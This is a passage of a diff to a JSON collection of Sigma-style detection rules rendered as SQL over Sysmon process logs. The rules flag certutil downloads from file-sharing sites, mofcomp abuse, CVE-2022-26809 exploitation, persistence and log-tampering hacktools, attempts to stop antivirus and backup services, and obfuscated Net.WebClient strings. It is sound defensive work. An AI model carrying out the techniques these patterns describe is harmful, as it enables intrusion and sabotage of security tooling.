'%gist.githubusercontent.com%' ESCAPE '\\' OR CommandLine LIKE '%mediafire.com%' ESCAPE '\\' OR CommandLine LIKE '%mega.nz%' ESCAPE '\\' OR CommandLine LIKE '%paste.ee%' ESCAPE '\\' OR CommandLine LIKE '%pastebin.com%' ESCAPE '\\' OR CommandLine LIKE '%pastebin.pl%' ESCAPE '\\' OR CommandLine LIKE '%pastetext.net%' ESCAPE '\\' OR CommandLine LIKE '%privatlab.com%' ESCAPE '\\' OR CommandLine LIKE '%privatlab.net%' ESCAPE '\\' OR CommandLine LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR CommandLine LIKE '%send.exploit.in%' ESCAPE '\\' OR CommandLine LIKE '%sendspace.com%' ESCAPE '\\' OR CommandLine LIKE '%storage.googleapis.com%' ESCAPE '\\' OR CommandLine LIKE '%transfer.sh%' ESCAPE '\\' OR CommandLine LIKE '%ufile.io%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\mofcomp.exe' ESCAPE '\\' OR OriginalFileName = 'mofcomp.exe') AND ((ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wsl.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\cscript.exe' ESCAPE '\\') OR (CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WINDOWS\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%appdata\\%%' ESCAPE '\\'))) AND NOT ((ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.mof' ESCAPE '\\'))) AND NOT ((CommandLine LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.mof' ESCAPE '\\')))" ], - "filename": "proc_creation_win_certutil_download_file_sharing_domains.yml" + "filename": "proc_creation_win_mofcomp_execution.yml" }, { - "title": "HackTool - SharPersist Execution", - "id": "26488ad0-f9fd-4536-876f-52fea846a2e4", + "title": "Potential CVE-2022-26809 Exploitation Attempt", + "id": "a7cd7306-df8b-4398-b711-6f3e4935cf16", "status": "experimental", - "description": "Detects the execution of the hacktool SharPersist - used to deploy various different kinds of persistence mechanisms", + "description": "Detects suspicious remote procedure call (RPC) service anomalies based on the spawned sub processes (long shot to detect the exploitation of vulnerabilities like CVE-2022-26809)", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1053" + "attack.initial_access", + "attack.t1190", + "attack.execution", + "attack.t1569.002" ], "falsepositives": [ - "Unknown" + "Unknown", + "Some cases in which the service spawned a werfault.exe process" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\SharPersist.exe' ESCAPE '\\' OR Product = 'SharPersist') OR (CommandLine LIKE '% -t schtask -c %' ESCAPE '\\' OR CommandLine LIKE '% -t startupfolder -c %' ESCAPE '\\') OR (CommandLine LIKE '% -t reg -c %' ESCAPE '\\' AND CommandLine LIKE '% -m add%' ESCAPE '\\') OR (CommandLine LIKE '% -t service -c %' ESCAPE '\\' AND CommandLine LIKE '% -m add%' ESCAPE '\\') OR (CommandLine LIKE '% -t schtask -c %' ESCAPE '\\' AND CommandLine LIKE '% -m add%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%-k RPCSS%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_sharpersist.yml" + "filename": "proc_creation_win_exploit_cve_2022_26809_rpcss_child_process_anomaly.yml" }, { - "title": "HackTool - SharpEvtMute Execution", - "id": "bedfc8ad-d1c7-4e37-a20e-e2b0dbee759c", + "title": "Net WebClient Casing Anomalies", + "id": "c86133ad-4725-4bd0-8170-210788e0a7ba", "status": "experimental", - "description": "Detects the use of SharpEvtHook, a tool that tampers with the Windows event logs", + "description": "Detects PowerShell command line contents that include a suspicious abnormal casing in the Net.Webclient (e.g. nEt.WEbCliEnT) string as used in obfuscation techniques", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.002" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SharpEvtMute.exe' ESCAPE '\\' OR Description = 'SharpEvtMute' OR (CommandLine LIKE '%--Filter \"rule %' ESCAPE '\\' OR CommandLine LIKE '%--Encoded --Filter \\\\\"%' ESCAPE '\\')))" - ], - "filename": "proc_creation_win_hktl_sharpevtmute.yml" - }, - { - "title": "Suspicious Windows Service Tampering", - "id": "ce72ef99-22f1-43d4-8695-419dcb5d9330", - "status": "experimental", - "description": "Detects the usage of binaries such as 'net', 'sc' or 'powershell' in order to stop, pause or delete critical or important Windows services such as AV, Backup, etc. As seen being used in some ransomware scripts", - "author": "Nasreddine Bencherchali (Nextron Systems), frack113", - "tags": [ - "attack.defense_evasion", - "attack.t1489" - ], - "falsepositives": [ - "Administrators or tools shutting down the services due to upgrade or removal purposes. If you experience some false positive, please consider adding filters to the parent process launching this command and not removing the entry" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%143Svc%' ESCAPE '\\' OR CommandLine LIKE '%Acronis VSS Provider%' ESCAPE '\\' OR CommandLine LIKE '%AcronisAgent%' ESCAPE '\\' OR CommandLine LIKE '%AcrSch2Svc%' ESCAPE '\\' OR CommandLine LIKE '%Antivirus%' ESCAPE '\\' OR CommandLine LIKE '%ARSM%' ESCAPE '\\' OR CommandLine LIKE '%aswBcc%' ESCAPE '\\' OR CommandLine LIKE '%Avast Business Console Client Antivirus Service%' ESCAPE '\\' OR CommandLine LIKE '%avast! Antivirus%' ESCAPE '\\' OR CommandLine LIKE '%AVG Antivirus%' ESCAPE '\\' OR CommandLine LIKE '%avgAdminClient%' ESCAPE '\\' OR CommandLine LIKE '%AvgAdminServer%' ESCAPE '\\' OR CommandLine LIKE '%AVP1%' ESCAPE '\\' OR CommandLine LIKE '%BackupExec%' ESCAPE '\\' OR CommandLine LIKE '%bedbg%' ESCAPE '\\' OR CommandLine LIKE '%BITS%' ESCAPE '\\' OR CommandLine LIKE '%BrokerInfrastructure%' ESCAPE '\\' OR CommandLine LIKE '%Client Agent 7.60%' ESCAPE '\\' OR CommandLine LIKE '%Core Browsing Protection%' ESCAPE '\\' OR CommandLine LIKE '%Core Mail Protection%' ESCAPE '\\' OR CommandLine LIKE '%Core Scanning Server%' ESCAPE '\\' OR CommandLine LIKE '%DCAgent%' ESCAPE '\\' OR CommandLine LIKE '%EhttpSr%' ESCAPE '\\' OR CommandLine LIKE '%ekrn%' ESCAPE '\\' OR CommandLine LIKE '%Enterprise Client Service%' ESCAPE '\\' OR CommandLine LIKE '%epag%' ESCAPE '\\' OR CommandLine LIKE '%EPIntegrationService%' ESCAPE '\\' OR CommandLine LIKE '%EPProtectedService%' ESCAPE '\\' OR CommandLine LIKE '%EPRedline%' ESCAPE '\\' OR CommandLine LIKE '%EPSecurityService%' ESCAPE '\\' OR CommandLine LIKE '%EPUpdateService%' ESCAPE '\\' OR CommandLine LIKE '%EraserSvc11710%' ESCAPE '\\' OR CommandLine LIKE '%EsgShKernel%' ESCAPE '\\' OR CommandLine LIKE '%ESHASRV%' ESCAPE '\\' OR CommandLine LIKE '%FA\\_Scheduler%' ESCAPE '\\' OR CommandLine LIKE '%FirebirdGuardianDefaultInstance%' ESCAPE '\\' OR CommandLine LIKE '%FirebirdServerDefaultInstance%' ESCAPE '\\' OR CommandLine LIKE '%HealthTLService%' ESCAPE '\\' OR CommandLine LIKE '%HISSQLFDLauncherSSHAREPOINIT%' ESCAPE '\\' OR CommandLine LIKE '%hmpalertsvc%' ESCAPE '\\' OR CommandLine LIKE '%HMS%' ESCAPE '\\' OR CommandLine LIKE '%IISAdmin%' ESCAPE '\\' OR CommandLine LIKE '%IMANSVC%' ESCAPE '\\' OR CommandLine LIKE '%IMAP4Svc%' ESCAPE '\\' OR CommandLine LIKE '%KAVFS%' ESCAPE '\\' OR CommandLine LIKE '%KAVFSGT%' ESCAPE '\\' OR CommandLine LIKE '%kavfsslp%' ESCAPE '\\' OR CommandLine LIKE '%klbackupdisk%' ESCAPE '\\' OR CommandLine LIKE '%klbackupflt%' ESCAPE '\\' OR CommandLine LIKE '%klflt%' ESCAPE '\\' OR CommandLine LIKE '%klhk%' ESCAPE '\\' OR CommandLine LIKE '%KLIF%' ESCAPE '\\' OR CommandLine LIKE '%klim6%' ESCAPE '\\' OR CommandLine LIKE '%klkbdflt%' ESCAPE '\\' OR CommandLine LIKE '%klmouflt%' ESCAPE '\\' OR CommandLine LIKE '%klnagent%' ESCAPE '\\' OR CommandLine LIKE '%klpd%' ESCAPE '\\' OR CommandLine LIKE '%kltap%' ESCAPE '\\' OR CommandLine LIKE '%KSDE1.0.0%' ESCAPE '\\' OR CommandLine LIKE '%LogProcessorService%' ESCAPE '\\' OR CommandLine LIKE '%M8EndpointAgent%' ESCAPE '\\' OR CommandLine LIKE '%macmnsvc%' ESCAPE '\\' OR CommandLine LIKE '%masvc%' ESCAPE '\\' OR CommandLine LIKE '%MBAMService%' ESCAPE '\\' OR CommandLine LIKE '%MBCloudEA%' ESCAPE '\\' OR CommandLine LIKE '%MBEndpointAgent%' ESCAPE '\\' OR CommandLine LIKE '%McAfeeDLPAgentService%' ESCAPE '\\' OR CommandLine LIKE '%McAfeeEngineService%' ESCAPE '\\' OR CommandLine LIKE '%MCAFEEEVENTPARSERSRV%' ESCAPE '\\' OR CommandLine LIKE '%McAfeeFramework%' ESCAPE '\\' OR CommandLine LIKE '%MCAFEETOMCATSRV530%' ESCAPE '\\' OR CommandLine LIKE '%McShield%' ESCAPE '\\' OR CommandLine LIKE '%McTaskManager%' ESCAPE '\\' OR CommandLine LIKE '%mfefire%' ESCAPE '\\' OR CommandLine LIKE '%mfemms%' ESCAPE '\\' OR CommandLine LIKE '%mfevto%' ESCAPE '\\' OR CommandLine LIKE '%mfevtp%' ESCAPE '\\' OR CommandLine LIKE '%mfewc%' ESCAPE '\\' OR CommandLine LIKE '%MMS%' ESCAPE '\\' OR CommandLine LIKE '%mozyprobackup%' ESCAPE '\\' OR CommandLine LIKE '%MsDtsServer%' ESCAPE '\\' OR CommandLine LIKE '%MSExchange%' ESCAPE '\\' OR CommandLine LIKE '%msftesq1SPROO%' ESCAPE '\\' OR CommandLine LIKE '%msftesql$PROD%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAP$SQL\\_2008%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAP$SYSTEM\\_BGC%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAP$TPS%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAP$TPSAMA%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAPSTPS%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAPSTPSAMA%' ESCAPE '\\' OR CommandLine LIKE '%MSSQ!I.SPROFXENGAGEMEHT%' ESCAPE '\\' OR CommandLine LIKE '%MSSQ0SHAREPOINT%' ESCAPE '\\' OR CommandLine LIKE '%MSSQ0SOPHOS%' ESCAPE '\\' OR CommandLine LIKE '%MSSQL%' ESCAPE '\\' OR CommandLine LIKE '%MySQL%' ESCAPE '\\' OR CommandLine LIKE '%NanoServiceMain%' ESCAPE '\\' OR CommandLine LIKE '%NetMsmqActivator%' ESCAPE '\\' OR CommandLine LIKE '%ntrtscan%' ESCAPE '\\' OR CommandLine LIKE '%ofcservice%' ESCAPE '\\' OR CommandLine LIKE '%Online Protection System%' ESCAPE '\\' OR CommandLine LIKE '%OracleClientCache80%' ESCAPE '\\' OR CommandLine LIKE '%PandaAetherAgent%' ESCAPE '\\' OR CommandLine LIKE '%PccNTUpd%' ESCAPE '\\' OR CommandLine LIKE '%PDVFSService%' ESCAPE '\\' OR CommandLine LIKE '%POP3Svc%' ESCAPE '\\' OR CommandLine LIKE '%POVFSService%' ESCAPE '\\' OR CommandLine LIKE '%PSUAService%' ESCAPE '\\' OR CommandLine LIKE '%Quick Update Service%' ESCAPE '\\' OR CommandLine LIKE '%RepairService%' ESCAPE '\\' OR CommandLine LIKE '%ReportServer%' ESCAPE '\\' OR CommandLine LIKE '%ReportServer$%' ESCAPE '\\' OR CommandLine LIKE '%RESvc%' ESCAPE '\\' OR CommandLine LIKE '%RpcEptMapper%' ESCAPE '\\' OR CommandLine LIKE '%sacsvr%' ESCAPE '\\' OR CommandLine LIKE '%SamSs%' ESCAPE '\\' OR CommandLine LIKE '%SAVAdminService%' ESCAPE '\\' OR CommandLine LIKE '%SAVService%' ESCAPE '\\' OR CommandLine LIKE '%ScSecSvc%' ESCAPE '\\' OR CommandLine LIKE '%SDRSVC%' ESCAPE '\\' OR CommandLine LIKE '%SentinelAgent%' ESCAPE '\\' OR CommandLine LIKE '%SentinelHelperService%' ESCAPE '\\' OR CommandLine LIKE '%SepMasterService%' ESCAPE '\\' OR CommandLine LIKE '%ShMonitor%' ESCAPE '\\' OR CommandLine LIKE '%Smcinst%' ESCAPE '\\' OR CommandLine LIKE '%SmcService%' ESCAPE '\\' OR CommandLine LIKE '%SMTPSvc%' ESCAPE '\\' OR CommandLine LIKE '%SNAC%' ESCAPE '\\' OR CommandLine LIKE '%SntpService%' ESCAPE '\\' OR CommandLine LIKE '%Sophos%' ESCAPE '\\' OR CommandLine LIKE '%SQ1SafeOLRService%' ESCAPE '\\' OR CommandLine LIKE '%SQL Backups%' ESCAPE '\\' OR CommandLine LIKE '%SQL Server%' ESCAPE '\\' OR CommandLine LIKE '%SQLAgent%' ESCAPE '\\' OR CommandLine LIKE '%SQLBrowser%' ESCAPE '\\' OR CommandLine LIKE '%SQLsafe%' ESCAPE '\\' OR CommandLine LIKE '%SQLSERVERAGENT%' ESCAPE '\\' OR CommandLine LIKE '%SQLTELEMETRY%' ESCAPE '\\' OR CommandLine LIKE '%SQLWriter%' ESCAPE '\\' OR CommandLine LIKE '%SSISTELEMETRY130%' ESCAPE '\\' OR CommandLine LIKE '%SstpSvc%' ESCAPE '\\' OR CommandLine LIKE '%svcGenericHost%' ESCAPE '\\' OR CommandLine LIKE '%swc\\_service%' ESCAPE '\\' OR CommandLine LIKE '%swi\\_filter%' ESCAPE '\\' OR CommandLine LIKE '%swi\\_service%' ESCAPE '\\' OR CommandLine LIKE '%swi\\_update%' ESCAPE '\\' OR CommandLine LIKE '%Symantec%' ESCAPE '\\' OR CommandLine LIKE '%Telemetryserver%' ESCAPE '\\' OR CommandLine LIKE '%ThreatLockerService%' ESCAPE '\\' OR CommandLine LIKE '%TMBMServer%' ESCAPE '\\' OR CommandLine LIKE '%TmCCSF%' ESCAPE '\\' OR CommandLine LIKE '%TmFilter%' ESCAPE '\\' OR CommandLine LIKE '%TMiCRCScanService%' ESCAPE '\\' OR CommandLine LIKE '%tmlisten%' ESCAPE '\\' OR CommandLine LIKE '%TMLWCSService%' ESCAPE '\\' OR CommandLine LIKE '%TmPfw%' ESCAPE '\\' OR CommandLine LIKE '%TmPreFilter%' ESCAPE '\\' OR CommandLine LIKE '%TmProxy%' ESCAPE '\\' OR CommandLine LIKE '%TMSmartRelayService%' ESCAPE '\\' OR CommandLine LIKE '%tmusa%' ESCAPE '\\' OR CommandLine LIKE '%Trend Micro Deep Security Manager%' ESCAPE '\\' OR CommandLine LIKE '%TrueKey%' ESCAPE '\\' OR CommandLine LIKE '%UI0Detect%' ESCAPE '\\' OR CommandLine LIKE '%UTODetect%' ESCAPE '\\' OR CommandLine LIKE '%Veeam%' ESCAPE '\\' OR CommandLine LIKE '%VeemaDep/oySvc%' ESCAPE '\\' OR CommandLine LIKE '%Veritas System Recovery%' ESCAPE '\\' OR CommandLine LIKE '%VSApiNt%' ESCAPE '\\' OR CommandLine LIKE '%VSS%' ESCAPE '\\' OR CommandLine LIKE '%W3Svc%' ESCAPE '\\' OR CommandLine LIKE '%wbengine%' ESCAPE '\\' OR CommandLine LIKE '%WdNisSvc%' ESCAPE '\\' OR CommandLine LIKE '%WeanClOudSve%' ESCAPE '\\' OR CommandLine LIKE '%Weems JY%' ESCAPE '\\' OR CommandLine LIKE '%WinDefend%' ESCAPE '\\' OR CommandLine LIKE '%wozyprobackup%' ESCAPE '\\' OR CommandLine LIKE '%WRSVC%' ESCAPE '\\' OR CommandLine LIKE '%Zoolz 2 Service%' ESCAPE '\\') AND ((((OriginalFileName IN ('net.exe', 'net1.exe') OR (Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\')) AND CommandLine LIKE '% stop %' ESCAPE '\\') OR ((OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll') OR (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\')) AND (CommandLine LIKE '%Stop-Service %' ESCAPE '\\' OR CommandLine LIKE '%Remove-Service %' ESCAPE '\\'))) OR ((OriginalFileName = 'sc.exe' OR Image LIKE '%\\\\sc.exe' ESCAPE '\\') AND (CommandLine LIKE '% stop %' ESCAPE '\\' OR CommandLine LIKE '% delete %' ESCAPE '\\' OR CommandLine LIKE '% pause %' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%TgBlAFQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AdwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AdwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AdwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AdwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AVwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AVwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AVwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AVwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AdwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AdwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AdwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AdwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAFQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAVAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AVwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AVwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AVwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AVwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAFQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAVAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AdwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AdwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AdwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AdwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAFQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAVAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AVwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AVwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AVwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AVwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAFQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAVAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AdwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AdwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AdwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAFQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAVAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AVwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAFcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgBXAEUAQg%' ESCAPE 